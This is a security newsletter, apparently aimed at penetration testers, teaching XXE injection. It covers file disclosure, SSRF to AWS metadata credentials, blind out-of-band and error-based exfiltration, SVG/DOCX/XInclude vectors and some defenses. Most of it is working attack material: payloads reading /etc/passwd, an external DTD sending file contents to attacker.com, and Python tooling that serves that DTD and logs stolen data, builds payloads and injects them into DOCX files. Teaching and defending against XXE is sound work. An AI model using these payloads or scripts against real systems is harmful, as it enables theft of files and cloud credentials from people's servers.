XXE Injection: When XML Parsers Become Your Worst Enemy

November 2, 2025

Hey everyone,

A few weeks ago, a colleague was testing an internal API and stumbled on an XXE vulnerability. The thing is, it was blind. No direct output, no error messages, nothing. We knew the parser was processing our entities, but we couldn’t figure out how to exfiltrate the data properly. We tried a few OOB techniques, but honestly, we didn’t nail the exploitation.

That stuck with me. I hate leaving vulnerabilities half-exploited. So I spent some time digging deeper into blind XXE, out-of-band exfiltration, and all the edge cases we probably missed.

The thing about XXE is that it’s one of those vulnerabilities that feels almost too easy when you find it. But when you don’t know what to look for, you’ll walk right past it. And that’s exactly why it keeps showing up in penetration tests, bug bounty reports, and CVEs year after year.

So let’s fix that. This newsletter breaks down XML External Entity (XXE) injection: what it is, how it works, and how to exploit it from basic file disclosure to blind out-of-band exfiltration.

What XXE Actually Is

XXE is a vulnerability that lets you abuse how XML parsers process external entities. When an application parses XML without properly configuring its parser, you can inject malicious entity declarations that force the server to:

  • Read arbitrary files from the filesystem
  • Make HTTP requests to internal systems (SSRF)
  • Perform denial of service attacks
  • In rare cases, achieve remote code execution

The root cause is simple: the XML 1.0 specification allows entities (basically variables in XML) to reference external resources. If the parser follows those references and the input isn’t sanitized, attackers control what gets loaded.

Here’s the basic structure of an XXE payload:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the parser processes this, it reads /etc/passwd and injects its contents where &xxe; appears. If that data shows up in the application’s response, you’ve got file disclosure.

Why This Still Matters in 2025

You’d think this would be fixed by now, right? XXE got its own OWASP Top 10 category (A4) back in 2017, and the 2021 edition folded it into Security Misconfiguration. But XXE vulnerabilities keep showing up.

Recent examples:

  • CVE-2024-34102 (CosmicSting) – A critical unauthenticated XXE in Adobe Commerce and Magento that could lead to remote code execution. Affected versions before 2.4.7-p1. CVSS score: 9.8/10.

  • CVE-2024-30043 – XXE in Microsoft SharePoint Server allowing file read with Farm Service account permissions and SSRF attacks. Patched in May 2024.

  • CVE-2023-42344 – Unauthenticated XXE in OpenCMS (versions 9.0.0 to 10.5.0) allowing remote code execution.

These aren’t small apps. These are enterprise platforms with millions of users. The problem? Legacy code, third-party libraries with insecure defaults, and developers who don’t realize their XML parser is dangerous out of the box.

Finding XXE Vulnerabilities

Not every endpoint that accepts XML is vulnerable. Modern frameworks often disable external entities by default. But you’d be surprised how many don’t.

Where to Look

Check any functionality that processes XML:

  • File uploads (especially DOCX, XLSX, SVG, or other XML-based formats)
  • API endpoints that accept Content-Type: application/xml
  • SOAP services
  • RSS/Atom feed parsers
  • SAML authentication flows
  • Configuration file uploads

Testing for XXE

Start with a basic probe. Send this payload and see if the parser even processes entities:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY test "HelloXXE">
]>
<root>
  <data>&test;</data>
</root>

If the response includes “HelloXXE” where you referenced &test;, the parser is processing entities. Now you can escalate.
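The probe can be scripted so the check is less error-prone. This is a minimal sketch under my own assumptions, not part of any tool: it splits the marker across two internal entities, so an application that simply echoes the raw payload back can't produce a false positive. The function names and the root/data element names are hypothetical.

```python
def build_probe(part_a: str = "Hello", part_b: str = "XXE") -> str:
    """Return an XML document whose text only reads part_a+part_b after entity expansion."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE root [\n"
        f'  <!ENTITY a "{part_a}">\n'
        f'  <!ENTITY b "{part_b}">\n'
        "]>\n"
        "<root>\n"
        "  <data>&a;&b;</data>\n"
        "</root>\n"
    )


def entities_expanded(response_body: str, part_a: str = "Hello", part_b: str = "XXE") -> bool:
    """True if the joined marker appears; the raw payload never contains it."""
    return (part_a + part_b) in response_body
```

Send build_probe() as the request body with whatever HTTP client you prefer, then pass the response text to entities_expanded().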

Basic File Disclosure

The classic XXE attack: read files from the server’s filesystem.

Payload to read /etc/passwd:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <username>&xxe;</username>
</root>

If the application reflects the <username> value in its response, you’ll see the contents of /etc/passwd.

Common files to target:

  • /etc/passwd – User accounts (Linux/Unix)
  • /etc/hosts – Static hostname mappings (can reveal internal hosts)
  • C:\Windows\System32\drivers\etc\hosts – Windows hosts file
  • /proc/self/environ – Environment variables (might leak secrets)
  • Application config files (e.g., /var/www/html/config.php)
  • Cloud metadata endpoints (more on this in a sec)

One thing to watch out for: some files contain characters that break XML parsing (like < or &). We’ll handle that with Base64 encoding in the blind XXE section.
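To avoid hand-editing the payload for every file in the list above, a small generator helps. This is a rough sketch: the helper names are mine, and the username element is just the one from the example payload, so swap in whichever element your target reflects.

```python
def to_file_uri(path: str) -> str:
    """Turn an absolute Unix or Windows path into a file:// URI."""
    normalized = path.replace("\\", "/")
    if not normalized.startswith("/"):
        normalized = "/" + normalized  # C:/Windows -> /C:/Windows
    return "file://" + normalized


def file_read_payload(path: str, element: str = "username") -> str:
    """Build the classic file-disclosure payload for one target path."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE root [\n"
        f'  <!ENTITY xxe SYSTEM "{to_file_uri(path)}">\n'
        "]>\n"
        "<root>\n"
        f"  <{element}>&xxe;</{element}>\n"
        "</root>\n"
    )


TARGETS = [
    "/etc/passwd",
    "/etc/hosts",
    r"C:\Windows\System32\drivers\etc\hosts",
    "/proc/self/environ",
]

payloads = {path: file_read_payload(path) for path in TARGETS}
```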

XXE to SSRF

This is where XXE gets really interesting. Instead of reading local files, you can make the server send HTTP requests to internal systems.

Example payload:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<root>
  <data>&xxe;</data>
</root>

The server makes an HTTP request to http://internal-service:8080/admin and, if the entity value is reflected, includes the response in its output. Because the request originates from inside the network, it sidesteps perimeter firewalls and can reach internal APIs, admin panels, or cloud metadata endpoints.

Cloud metadata exploitation:

If you’re testing an app running on AWS, try this:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

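This hits the AWS metadata service and lists the IAM role attached to the instance. Append the role name to the URL and you get temporary credentials carrying whatever permissions that role has. One caveat: this only works against IMDSv1. IMDSv2 requires a session token obtained with a PUT request, which an XXE-driven GET can’t do. Azure (http://169.254.169.254/metadata/instance?api-version=2021-02-01) and GCP expose similar endpoints, but both require a custom request header (Metadata: true and Metadata-Flavor: Google respectively), so plain XXE usually can’t reach them.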
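On AWS the credentials path is a two-step lookup: the directory URL returns role names, one per line, and appending a name returns that role's temporary credentials as JSON. A sketch of the second step, assuming you already got the listing back through the first payload (the helper names and the role name in the usage note are made up):

```python
from typing import List

BASE = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def credential_urls(role_listing: str) -> List[str]:
    """Map the role names returned by the directory URL to per-role credential URLs."""
    roles = [line.strip() for line in role_listing.splitlines() if line.strip()]
    return [BASE + role for role in roles]


def entity_for(url: str) -> str:
    """Entity declaration to drop into the DOCTYPE of the next request."""
    return f'<!ENTITY xxe SYSTEM "{url}">'
```

For example, if the first response contained a single line reading example-role, entity_for(credential_urls("example-role\n")[0]) gives you the declaration for the follow-up request.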

Combine this with the techniques from my SSRF newsletter (Issue 4) and you can chain XXE into full internal network access.

Blind XXE: When You Don’t See Output

Sometimes the application doesn’t reflect the XML data in its response. The parser processes your payload, but you don’t see the result. That’s blind XXE.

Out-of-Band (OOB) Exfiltration

The trick here is to make the server send the data to a system you control. You need two things:

  1. A server you control to receive the data (use Burp Collaborator, your own VPS, or webhook.site)
  2. A payload that references an external DTD hosted on your server

Step 1: Host a malicious DTD on your server (http://attacker.com/evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Step 2: Send this payload to the target:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root></root>

Here’s what happens:

  1. The parser loads your external DTD
  2. The DTD defines a parameter entity that reads /etc/passwd
  3. It defines another entity that makes an HTTP request to your server, embedding the file contents in the URL
  4. Your server receives the request with the file data in the query string
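If you'd rather run your own listener than rely on Collaborator, the flow above fits in a few lines of standard-library Python. Treat this as a sketch under assumptions: CALLBACK_BASE reuses the attacker.com placeholder from the article, port 8000 is arbitrary, and the handler serves the DTD for any path ending in .dtd while logging the data parameter of every other request.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlparse

CALLBACK_BASE = "http://attacker.com"  # placeholder: the address the target can reach you on


def build_dtd(callback_base, target="file:///etc/passwd"):
    """Render the external DTD from Step 1 for a given callback URL."""
    return (
        f'<!ENTITY % file SYSTEM "{target}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'{callback_base}/?data=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def extract_exfil(request_path):
    """Pull the data= value out of a request path, or return None if absent."""
    for part in urlparse(request_path).query.split("&"):
        key, _, value = part.partition("=")
        if key == "data":
            return unquote(value)  # plain unquote keeps '+' intact for Base64 data
    return None


class ExfilHandler(BaseHTTPRequestHandler):
    captured = []  # data values seen so far, shared across requests

    def do_GET(self):
        if urlparse(self.path).path.endswith(".dtd"):
            body = build_dtd(CALLBACK_BASE).encode()
        else:
            body = b""
            data = extract_exfil(self.path)
            if data is not None:
                self.captured.append(data)
                print("exfiltrated:", data)
        self.send_response(200)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def make_server(port=8000):
    """Create the listener; call .serve_forever() on the result to start it."""
    return HTTPServer(("0.0.0.0", port), ExfilHandler)
```

Start it with make_server().serve_forever(), then send the Step 2 payload pointing at your /evil.dtd.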

Pro tip: If the file contains newlines or special characters that break URLs, and the target runs PHP, wrap the read in a Base64 filter:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

Then Base64-decode the exfiltrated data on your end.
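Decoding is a one-liner, but exfiltrated values often arrive slightly mangled. A small sketch that assumes the two problems I'd expect most: padding that got dropped, and '+' characters turned into spaces by query-string decoding. The function name is hypothetical.

```python
import base64


def decode_exfil(value: str) -> str:
    """Decode a Base64 value captured from a callback URL."""
    cleaned = value.strip("\r\n").replace(" ", "+")  # undo '+' -> space mangling
    cleaned += "=" * (-len(cleaned) % 4)             # restore stripped padding
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")
```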

Error-Based Blind XXE

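If the application doesn’t reflect entity values but does return parser error messages, you can sometimes leak data through those errors instead. As written here, the technique still needs an external DTD, so the target must be able to fetch it from your server. With no egress at all, you need the local DTD variant mentioned in the note at the end of this section.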

Malicious DTD hosted on your server (http://attacker.com/error.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Payload sent to target:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
  %dtd;
]>
<root></root>

The parser tries to access a file at /nonexistent/[contents of /etc/passwd], fails, and includes the file path (with embedded file contents) in the error message.
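Pulling the file contents back out of the error is mechanical once you know the marker path. Error formats differ between parsers, so this sketch makes two assumptions: the message contains the /nonexistent/ marker from the DTD, and it may end with a reason suffix such as " (No such file or directory)". Adjust both for what your target actually returns.

```python
def leaked_from_error(error_text, marker="/nonexistent/",
                      suffix=" (No such file or directory)"):
    """Return whatever follows the marker path in an error message, or None."""
    idx = error_text.find(marker)
    if idx == -1:
        return None
    leaked = error_text[idx + len(marker):]
    if leaked.endswith(suffix):
        leaked = leaked[: -len(suffix)]  # drop the parser's trailing reason
    return leaked
```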

Note: Because of XML specification restrictions on using parameter entities within internal DTDs, this technique requires either an external DTD or repurposing an existing local DTD file on the server.

XXE in Unexpected Places

Don’t just test plain XML endpoints. XXE hides in formats you wouldn’t expect.

File Uploads

SVG images are XML-based. If an app lets you upload profile pictures and processes SVG files, try embedding an XXE payload:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

Upload it, and if the app displays or processes the SVG server-side, you might trigger XXE.

DOCX and XLSX files are ZIP archives containing XML. Extract one, modify the XML inside (e.g., word/document.xml), inject your payload, rezip it, and upload. I’ve seen this work in document preview features and automated processing systems.
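The extract, modify, rezip cycle is easy to automate with the standard zipfile module. This is a sketch under assumptions: it injects a DOCTYPE right after the XML declaration of word/document.xml and references the entity inside the first w:t text run. The DOCTYPE name and the choice of /etc/hostname are placeholders, and some parsers may expect the DOCTYPE name to match the root element.

```python
import io
import re
import zipfile

DOCTYPE = '<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'


def inject_xxe(docx_bytes: bytes, member: str = "word/document.xml") -> bytes:
    """Return a copy of the archive with an XXE payload added to one XML member."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == member:
                xml = data.decode("utf-8")
                # Place the DOCTYPE directly after the XML declaration, if there is one
                xml, count = re.subn(r"(<\?xml[^>]*\?>)",
                                     lambda m: m.group(1) + DOCTYPE, xml, count=1)
                if count == 0:
                    xml = DOCTYPE + xml
                # Reference the entity at the start of the first text run
                xml = re.sub(r"(<w:t(?:\s[^>]*)?>)",
                             lambda m: m.group(1) + "&xxe;", xml, count=1)
                data = xml.encode("utf-8")
            dst.writestr(item.filename, data)
    return out.getvalue()
```

Usage is a read, a call, and a write: load the original file's bytes, pass them through inject_xxe(), and save the result under a new name before uploading.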

XInclude Attacks

Sometimes you don’t control the entire XML document, just a single value inside it. Standard XXE won’t work because you can’t define a DOCTYPE. That’s where XInclude comes in.

If you control a value in the XML, try this:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

XInclude lets you include external files directly in XML elements, bypassing the need for entity declarations.
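In practice the value you control is often a form field that the backend drops into an XML document. A sketch of building such a request body, assuming a form-encoded POST; the field names in the usage note are hypothetical.

```python
from urllib.parse import urlencode

XINCLUDE = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="{href}"/>'
    "</foo>"
)


def xinclude_form_body(field, href="file:///etc/passwd", **other_fields):
    """URL-encode a form body where one field carries the XInclude snippet."""
    fields = dict(other_fields)
    fields[field] = XINCLUDE.format(href=href)
    return urlencode(fields)
```

For example, xinclude_form_body("productId", storeId="1") produces a body you can paste into an intercepted request.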

Content-Type Switching

Some apps accept Content-Type: application/json but also parse application/xml if you send it. Try switching your POST request from JSON to XML and see if the endpoint still processes it.

From this:

POST /api/user HTTP/1.1
Content-Type: application/json

{"username": "test"}

To this:

POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><username>&xxe;</username></root>

If the backend uses a library that auto-detects content types or falls back to XML parsing, you might trigger XXE on an endpoint that wasn’t designed to accept XML.
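Converting the JSON body by hand gets tedious across many endpoints. This sketch assumes a flat JSON object and a wrapper element called root, both of which are guesses you'll need to adapt to the target. It turns each key into an element and swaps one value for the entity reference.

```python
import json
from xml.sax.saxutils import escape


def json_to_xxe_xml(json_body, inject_key, uri="file:///etc/passwd", root="root"):
    """Rewrite a flat JSON object as XML, replacing one value with &xxe;."""
    fields = json.loads(json_body)
    parts = []
    for key, value in fields.items():
        content = "&xxe;" if key == inject_key else escape(str(value))
        parts.append(f"<{key}>{content}</{key}>")
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        f"<{root}>{''.join(parts)}</{root}>"
    )
```

Calling json_to_xxe_xml('{"username": "test"}', "username") reproduces the XML request body shown above.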

Tools You Need

Burp Suite – Essential for intercepting and modifying requests. Burp Collaborator is perfect for OOB testing.

XXEinjector – Automates XXE exploitation including OOB exfiltration and enumeration. Supports direct and out-of-band methods (FTP, HTTP, Gopher). https://github.com/enjoiz/XXEinjector

DTD Finder – Lists DTDs and generates XXE payloads using local DTD files. Useful for blind XXE exploitation. https://github.com/GoSecure/dtd-finder

PayloadsAllTheThings (XXE Section) – Comprehensive payload collection with classic XXE, OOB, and various exploitation techniques. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection

Where to Practice

PortSwigger Web Security Academy – Multiple XXE labs with increasing difficulty. All labs are free:

Main XXE page: https://portswigger.net/web-security/xxe

TryHackMe – XXE Injection Room – Premium room covering in-band, out-of-band, and expansion XXE attacks. Includes exercises chaining XXE with SSRF. https://tryhackme.com/room/xxeinjection

Hack The Box – BountyHunter – Easy-rated Linux machine featuring XXE exploitation to read PHP source files and dump database credentials. Good introduction to practical XXE in a realistic scenario. https://app.hackthebox.com/machines/BountyHunter

Defense and Detection

If you’re defending against XXE, here’s what actually works:

Disable External Entities – The nuclear option. Most XML libraries have config flags to disable DTD processing entirely. Use them.

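// Java example
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Refuse any document that carries a DOCTYPE, which rules out entity declarations entirely
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);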

Use Simple Data Formats – If you don’t need XML’s complexity, use JSON. Fewer features = smaller attack surface.

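Input Validation – Reject any XML containing DOCTYPE, ENTITY, or SYSTEM keywords. Not foolproof (keyword filters can be dodged with alternate encodings such as UTF-16, and they don’t cover XInclude), but it catches lazy attacks.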
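A string match on the raw bytes is the weakest form of this check. One alternative, sketched here with Python's standard expat bindings, is to let a real parser find the DOCTYPE and abort as soon as it sees one. The exception and function names are mine, and this is a pre-parse gate, not a replacement for configuring your actual parser.

```python
from xml.parsers import expat


class DoctypeRejected(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def assert_no_doctype(xml_bytes: bytes) -> None:
    """Parse the document and raise DoctypeRejected at the first DOCTYPE."""
    def reject(name, system_id, public_id, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE declaration not allowed: {name}")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject  # fires before any entity is declared
    parser.Parse(xml_bytes, True)            # malformed XML raises expat.ExpatError
```

Because the parser does the decoding, the check doesn't hinge on spotting a literal keyword in the byte stream.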

Least Privilege – Run your XML parser with minimal file system access. If it can’t read /etc/passwd, XXE becomes much less useful.

Monitor Outbound Traffic – Blind XXE relies on exfiltration. Alert on unexpected HTTP requests from your backend to external IPs.

Wrapping Up

XXE is one of those vulnerabilities that seems straightforward on paper but has a surprising amount of depth. Basic file disclosure is the entry point, but once you understand OOB exfiltration, SSRF chaining, and hunting XXE in unexpected formats like SVG or DOCX, you unlock a whole new class of attack vectors.

The reason XXE keeps appearing in CVEs is that it’s easy to miss. An app might not directly accept XML, but a third-party library processing uploaded files might. Or an API endpoint designed for JSON might fall back to XML parsing. Or a developer might enable XML features “just in case” and never disable them.

So next time you’re testing an app, grep for XML. Check file uploads. Try content-type switching. You might be surprised what you find.

Coming This Week

This week, probably on Wednesday, I’ll be publishing a new article in the Web3 series: an introduction to how signatures work in Ethereum. We’ll cover the fundamentals of digital signatures, how Ethereum implements them, and why they’re critical for smart contract and wallet security. It’s the perfect starting point before diving into replay attacks and other signature-based exploitation techniques.

Thanks for reading, and happy hunting.

Ruben
